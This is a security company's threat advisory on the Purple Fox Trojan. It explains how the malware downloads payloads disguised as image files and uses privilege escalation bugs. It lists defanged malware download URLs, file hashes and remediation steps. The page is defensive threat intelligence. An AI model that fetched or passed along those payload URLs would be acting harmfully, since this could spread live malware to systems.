Platform
Managed Security Services
Managed Penetration Testing
Rewterz penetration testing services help organizations determine if a cyber attacker can gain access to their critical assets while giving them detailed insights of the overall business impact of a cyber attack.
Resources
March 19, 2023Severity Medium Analysis Summary CVE-2022-42436 IBM MQ Managed File Transfer could allow a local user to obtain sensitive information from diagnostic files. Impact Indicators Of Compromise […]March 19, 2023Severity Medium Analysis Summary CVE-2023-0027 Rockwell Automation Modbus TCP AOI Server could allow a remote attacker to obtain sensitive information. By sending a malformed message, an […]March 17, 2023Severity High Analysis Summary CVE-2023-27984 CVSS:7.8 Schneider Electric IGSS could allow a remote attacker to execute arbitrary code on the system, caused by improper input validation […]Threat Insights
Before Rewterz got its start, the market was in dire need of a specialized and dedicated information security company. It was nearly impossible for businesses to find a trustworthy provider that could truly cover all of their bases. We wanted to meet this need, giving companies across the globe a chance to get ahead while knowing that their data is in good hands.
Connect with Us
Platform
Managed Security Services
Managed Penetration Testing
Rewterz penetration testing services help organizations determine if a cyber attacker can gain access to their critical assets while giving them detailed insights of the overall business impact of a cyber attack.
Resources
March 19, 2023Severity Medium Analysis Summary CVE-2022-42436 IBM MQ Managed File Transfer could allow a local user to obtain sensitive information from diagnostic files. Impact Indicators Of Compromise […]March 19, 2023Severity Medium Analysis Summary CVE-2023-0027 Rockwell Automation Modbus TCP AOI Server could allow a remote attacker to obtain sensitive information. By sending a malformed message, an […]March 17, 2023Severity High Analysis Summary CVE-2023-27984 CVSS:7.8 Schneider Electric IGSS could allow a remote attacker to execute arbitrary code on the system, caused by improper input validation […]Threat Insights
Before Rewterz got its start, the market was in dire need of a specialized and dedicated information security company. It was nearly impossible for businesses to find a trustworthy provider that could truly cover all of their bases. We wanted to meet this need, giving companies across the globe a chance to get ahead while knowing that their data is in good hands.
Connect with Us
Rewterz Threat Advisory – CVE-2019-18245 – ICS: Reliable Controls LicenseManager
December 4, 2019Rewterz Threat Alert – Spear-Phishing Campaigns Deliver the BalkanRAT
December 4, 2019
Severity
High
Analysis Summary
Purple Fox Trojan is being pushed to victims after invasion via SQL. The attackers then download and execute multiple virus files including the Purple Fox Trojan MSI installation package, privilege escalation vulnerability, powershell script Trojan, etc. The function of the executed script is mainly to download and execute, download and execute multiple jpg, png, and picture format files. These files are disguised with picture formats. In fact, they are powershell script viruses, MSI purple fox Trojan installation files, EXE elevation of privilege vulnerabilities, etc. These will download and execute multiple privilege escalation vulnerabilities, including CVE-2018-8120, CVE-2015-1701 , ms16-032, etc., to elevate privileges, thereby enhancing the execution permissions of the current process, in order to facilitate the successful installation of the virus’s MSI installation file.
ms16-032 download address:
hxxp: //es.ldbdhm.xyz/sqlexec/1603232.jpg
CVE-2018-8120 module download address :
hxxp: //es.ldbdhm.xyz/sqlexec/1808164.jpg
hxxp: //es.ldbdhm.xyz/sqlexec/1808132.jpg
The downloaded SMB1.jpg, SMB3.jpg, and Sps.jpg files are actually MSI installation packages. The download address is hxxp: //Es.ldbdhm.xyz/sqlexec/xxx.jpg
Impact
- Code Execution
- Privilege Escalation
- Unauthorized Access
Indicators of Compromise
MD5
- 364ac68062168fc334f478a2997c6298
- 4facb81f57e515a508040270849bcd35
- 3fe38271b009298b4cb0b01ef57edbf3
- de5de649e0821b0dd3dadfa8235416ea
- be0384e85412a2668008f76dc3b3ccea
- f5df39c5ed4eb90c169216ace51ed833
- 5bab2f1dd53b3ae08dab8a1a2d7c145c
- 4658ddc4e03f0003f590666ab73261e3
- 2c62e2fbef311731ebbc26c785d10f2b
- 14018f47163809b0166591f87d1bb046
- 6467874d952a5ffc1edfd7f05b1cc86d
- beac6592dbd3a479a64789e43ec20f27
- b43442df320d1f89defd772991b6335c
- ae3e7304122469f2de3ecbd920a768d1
SHA-256
- 51a81cc0bbf67360833332d7e13aaa8b2cca6e8a18d117803cc7094bbb0336ed
- 07191e65af30541f71e876b6037079a070a34c435641897dc788c15e5f62f53c
- b2cb65c9ac36f1e3fb31dfd5235c29b396be0968e6b225d625dc3c8fd72395f4
- 762551af11f78b73441b33bd7d70890d9f835cf878dd7088463b7b07bc007aa5
- 0a6c1b99447a8ef47f8aabc57c3254b1ba128ab1dc3024453062b21ac22cc45a
- 4bf8d57ffdbfd400048b874ed0b42a8ca7f8257b7d244b7c856b6c9bf680486f
- 78375c2ea7c8fb7fb40d41f750eab63271348a11559ddb71410b16e66326d373
- 5e45545b7dd0af0ef81bee46477d41c80b6c866a4435e67306bb3c0f4f600651
- 48866c413efcfa1c5f7ab15054a16415884101e9eca2873d9a1f138440a66cfb
- 5a6f76daca16b2d8f737e8e51a2290d89aae5d412b6b0328f14b3094401e72f2
- ca7bd2830405ed53fd7f56738d7644ff8ecfd5bc63d079d322c99601c6106843
- f0b0e0548b218fb81940a4daf85c3709b2159bb357cab2f55576af3d75d47094
- 61113a0acd6469ce0d860db55c2afa3cdcbac2f5411fe8259cca43c10c042239
- 33a584a0d4907b063af867fd33cc39362b74e96e72d2ad97db7748131364eab1
URL
- hxxp://es.ldbdhm[.]xyz/SMB3.jpg
- http[:]//es.ldbdhm[.]xyz/sqlexec/1808164.jpg
- http[:]//es.ldbdhm[.]xyz/sqlexec/1808132.jpg
- http[:]//es.ldbdhm[.]xyz/sqlexec/pe.jpg
- http[:]//es.ldbdhm[.]xyz/sqlexec/sps.jpg
- http[:]//es.ldbdhm[.]xyz/smb3p.jpg
- http[:]//es.ldbdhm[.]xyz/SMB1.jpg
- http[:]//es.ldbdhm[.]xyz/SMB2.jpg
- http[:]//es.ldbdhm.xyz/SMB2P[.]jpg
- http[:]//es.ldbdhm[.]xyz/smb1p.jpg
- http[:]//es.ldbdhm[.]xyz/sqlexec/1505164.jpg
- http[:]//es.ldbdhm.xyz/sqlexec/1603232[.]jpg
- http[:]//es.ldbdhm[.]xyz/sqlexec/1505132.jpg
- http[:]//es.ldbdhm[.]xyz/sqlexec/1603264.jpg
Remediation
- Block the threat indicators at their respective controls
- Maintain patches against CVE-2018-8120, CVE-2015-1701 , ms16-032.